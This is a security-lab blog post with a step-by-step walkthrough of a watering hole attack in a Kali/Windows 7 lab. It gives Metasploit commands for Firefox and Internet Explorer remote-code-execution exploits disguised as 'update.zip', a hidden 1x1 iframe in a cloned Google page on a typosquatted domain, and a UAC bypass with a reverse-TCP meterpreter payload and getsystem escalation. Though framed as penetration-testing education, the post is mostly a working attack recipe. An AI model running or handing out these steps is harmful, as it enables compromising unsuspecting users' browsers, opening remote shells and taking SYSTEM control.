Setting up a watering hole attack with metasploit

Jul 3, 2020 by Georgi Nikolov | 555 views

Offensive Security Pentesting

https://cylab.be/blog/83/setting-up-a-watering-hole-attack-with-metasploit

In recent years we have witnessed multiple organised attacks against countries and companies using malicious code that was distributed via a legitimate website. These types of attacks are called "watering hole attacks" as they target well known and used websites and compromising them. You could compare this to dumping poison or other dangerous chemicals in a pond or well, where your intentions are to target any and all that use that source. One of the more famous such attacks was the CCleaner Watering Hole attack, which used the well-known tool CCleaner to distribute its malicious code.

To better understand how such an attack is possible, we created a simple scenario, where we use a known website and redirect any connection to it to our malicious server and try to establish a connection to the victim's machine. This is simply an exercise and is a very simple but powerful example of what is possible. We do not advocate the irresponsible use of any tools or techniques that we show, but advise to take heed and always be on guard when browsing the web.

Setup

To test this type of attack we deploy a Win7 machine running Internet Explorer 10 and Mozilla Firefox version 40.0. If you don't have the corresponding version of Firefox, it can be downloaded from the Mozilla official FTP server. For the attack we will be using the Kali 2018 Virtual Machine. The account that we will hack has the UAC (User Account Control) set to "Default".

Setting up the Kali Watering Hole attack with metasploit

First we need to run metasploit via:

   ~$ msfconsole

Depending on which browser we are targeting, different vulnerabilities will be used. For the Firefox Browser we will use the Firefox nsSMILTimeContainer::NotifyTimeChange() RCE exploit. This exploit uses Javascript to open a meterpreter connection to the victim's machine.

   msf > use exploit/windows/browser/firefox_smil_uaf
   msf exploit(firefox_smil_uaf) > show targets
      ...shows targets...
   msf exploit(firefox_smil_uaf) > set TARGET < target-id >
   msf exploit(firefox_smil_uaf) > show options
      ...show and set options...
   msf exploit(firefox_smil_uaf) > set SRVPORT 80
   msf exploit(firefox_smil_uaf) > set URIPATH update.zip   
   msf exploit(firefox_smil_uaf) > exploit

The exploit will start a server locally and you will see this message:

   [*] Exploit running as background job 0.
   [*] Exploit completed, but no session was created.

   [*] Started reverse TCP handler on <YOUR IP>:4444
   [*] Using URL: http://0.0.0.0:80/update.zip
   [*] Local IP: http://<YOUR IP>:80/update.zip
   [*] Server started.
The Local IP is where the victim needs to access to trigger the exploit.

It is not as different if we want to set up an attack targeting Internet Explorer 10 using the MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution.

   msf > use exploit/windows/browser/ms14_064_ole_code_execution
   msf exploit(ms14_064_ole_code_execution) > show targets
      ...show targets...
   msf exploit(ms14_064_ole_code_execution) > set TARGET < target-id >
   msf exploit(ms14_064_ole_code_execution) > show options
      ...show and set options...
   msf exploit(firefox_smil_uaf) > set SRVPORT 80
   msf exploit(firefox_smil_uaf) > set URIPATH update.zip 
   msf exploit(ms14_064_ole_code_execution) > exploit

Again a local server will be initiated and will wait for connections to it. If a connection is established, metasploit will try to establish a meterpreter session.

Setting up the watering hole website

After we have already set up our Metasploit server to wait for a connection from the victim, we need to create the watering hole website that we will share with the victim. For this exercise we will use the Google starting page. We can easily right click on the website and save the webpage locally. That way we can adapt the code of the website by adding a simple <iframe> to the website pointing to the Kali Machine server. In the <iframe> we put the IP address of the Metasploit server that we instantiated and put the width and height of the frame to 1, this way it will be very difficult to find with the naked eye. We rename the website to www.gooogle.com and using apache2 we can run the website locally. If we would want to create a real website for our watering hole attack, we would need to buy a domain name and find a website hosting service for it.

Connecting and exploiting the victim

Once everything has been set-up, we can share the link of our compromised website with the victim. When the victim connects to it, the <iframe> will load our malicious server in the background, invisible to the user. When the connection to the Metasploit server is established, a meterpreter connection will be open to the victim's machine.

Using the meterpreter connection we can browse the files on the victim's machine using ls or dir commands and see what processes are running using the ps command. It is possible to migrate from one process to another to hide our activity, but in this case the exploit that we are using do that for us.

In most cases the meterpreter connection will have users privileges, which means that if we want to do more advanced things on the victim's machine we will need to elevate these privileges. To do that we can use another exploit in Metasploit, namely the exploit/windows/local/bypassauc technique. To do that we can go back to Metasploit using the background command and use the bypassauc technique.

   meterpreter > background
   msf > use exploit/windows/local/bypassauc
   msf exploit(windows/local/bypassauc) > show targets
      ...shows targets...
   msf exploit(windows/local/bypassauc) > set TARGET < target-id >
   msf exploit(windows/local/bypassauc) > show options
      ...show and set options...
   msf exploit(windows/local/bypassauc) > set SESSION 1
   msf exploit(windows/local/bypassauc) > set payload windows/meterpreter/reverse_tcp
   msf exploit(windows/local/bypassauc) > set LHOST <your-IP>
   msf exploit(windows/local/bypassauc) > set LPORT 80 
   msf exploit(windows/local/bypassauc) > exploit

This exploit will only work if UAC (User Account Control) has been activated for the given user and he already is part of the Admin group. When this exploit is finished it will open a new meterpreter session, still using the currently exploited user. If we go into the newly created session we can run the getsystem command to elevate our privileges to SYSTEM level. We can verify that this was successful by running getuid and getprivs to check that the privileges were well elevated.

(Optional) It is possible that the exploit/windows/local/bypassauc technique opens a Windows shell instead of a new meterpreter session. In this case there is a way to convert the shell to meterpreter using the following steps:

  1. use post/multi/manage/shell_to_meterpreter
  2. set LHOST to \<attackers IP>
  3. set LPORT to 8080
  4. set SESSION to the current command shell session
  5. exploit

Final Words

All these techniques are used for penetration testing and we do not endorse them for any malicious activity. In our line of work it is vital that we know and research what kind of attacks we can expect on our networks and machines, but we will never use them against unwilling targets.

You might also like...